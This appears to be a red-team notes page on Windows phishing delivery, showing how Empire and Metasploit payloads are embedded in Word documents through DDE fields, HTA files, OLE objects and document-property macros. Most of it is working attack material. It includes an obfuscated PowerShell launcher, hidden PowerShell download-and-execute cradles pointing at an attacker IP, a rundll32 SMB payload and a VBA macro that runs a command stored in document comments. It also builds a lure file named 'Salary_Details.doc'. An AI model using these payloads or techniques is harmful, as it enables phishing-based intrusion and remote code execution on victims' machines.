Phish

C&C, Red Team, Windows

Phish Phish Phish …

  • DDE
  • HTA
  • OLE
  • smb_delivery
  • web_delivery

DDE

  • create listener and launcher with empire
1
2
(Empire: listeners) > launcher powershell New
CMd.exE  /c  "Set  EjBM= SET-ITEm ("VaR"+"iAbL"+"E:"+"V"+"T7JH") ( [TyPE]("{8}{0}{5}{10}{9}{3}{2}{7}{1}{4}{11}{6}{12}" -F'c','R','s','ry[','inG,','TIonS.Ge','YStEM.ObjEC','T','coLlE','.dIctIoNA','NeriC','s','t') ) ;  $Ksc5U  = [tyPe]("{1}{3}{0}{2}"-f 'Tb','sCrI','LOCK','p')  ;SEt-item ("vArIA"+"bLe:"+"g"+"FN"+"A")  (  [type]("{0}{1}" -F 'r','Ef')) ;   sEt-VARIabLE ("5a"+"q")  ( [TYpE]("{4}{6}{2}{7}{0}{5}{1}{3}"-f 'Ointm','N','erVI','aGEr','sySTe','a','M.NeT.s','cep'))  ;   sEt-itEm  ("VAr"+"I"+"ABlE"+":PTd5") (  [TyPE]("{3}{0}{2}{1}" -f'm.Ne','bReQUest','t.WE','SYsTE')  )  ;$rbT  = [tYpe]("{4}{0}{3}{2}{1}{5}" -F'Net.crED','lcAC','tia','eN','sYStEm.','HE') ;    seT  ("e"+"78") ([TYPE]("{2}{3}{0}{1}{5}{4}" -F 'm.T','EXT','SYst','E','ODInG','.enC') );If(${ ...
  • save it in web server
  • create word document and put following in field

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://192.168.1.226:8000/evil');powershell

  • stager will return

HTA

  • create payload and put it on web server
1
2
3
4
5
(Empire: stager/windows/hta) > execute

[*] Stager output written out to: /tmp/hello.hta

(Empire: stager/windows/hta) >
  • use some SE techniques to download hta file and make run.

OLE

  • create bat launcher in empire
  • put it in ms word
  • use some SE to run the files
  • agent will come

Document Properties

  • create metasploit smb_delivery payload , it will create some dll
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
msf exploit(smb_delivery) > show options

Module options (exploit/windows/smb/smb_delivery):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   FILE_NAME    test.dll         no        DLL file name
   FOLDER_NAME                   no        Folder name to share (Default none)
   SHARE                         no        Share (Default Random)
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      445              yes       The local port to listen on.


Exploit target:

   Id  Name
   --  ----
   0   DLL

msf exploit(smb_delivery) > run
[*] Exploit running as background job 4.

[*] Started reverse TCP handler on 192.168.1.226:1234
[*] Server started.
[*] Run the following command on the target machine:
rundll32.exe \\192.168.1.226\OJjhxT\test.dll,0

msf exploit(smb_delivery) >
  • create word document and put payload in properties
  • put macro 
1
2
3
4
5
6
7
8
9
10
11
12
Sub kth()
 
Dim p As DocumentProperty
 
For Each p In ActiveDocument.BuiltInDocumentProperties
If p.Name = "Comments" Then
Shell (p.Value)
 
End If
Next
 
End Sub
  • when the macro is executed

Metaspoit and Nishang

  • Create web_delivery payload from metasploit
1
2
3
4
5
6
7
8
9
10
msf exploit(web_delivery) > run
[*] Exploit running as background job 2.

[*] Started reverse TCP handler on 192.168.1.226:4444
[*] Using URL: http://0.0.0.0:8080/D51fxh4MH
[*] Local IP: http://192.168.1.226:8080/D51fxh4MH
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $i=new-object net.webclient;$i.proxy=[Net.WebRequest]::GetSystemWebProxy();$i.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $i.downloadstring('http://192.168.1.226:8080/D51fxh4MH');
msf exploit(web_delivery) >
  • create word , exel , lnk files with nishang modules
1
2
3
4
PS C:\Users\Kyaw Thiha\Documents> IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.226:8000/Out-Word.ps1")
PS C:\Users\Kyaw Thiha\Documents> out-word -Payload "powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://192.168.1.226:8080/D51fxh4MH'); "
Saved to file C:\Users\Kyaw Thiha\Documents\Salary_Details.doc
0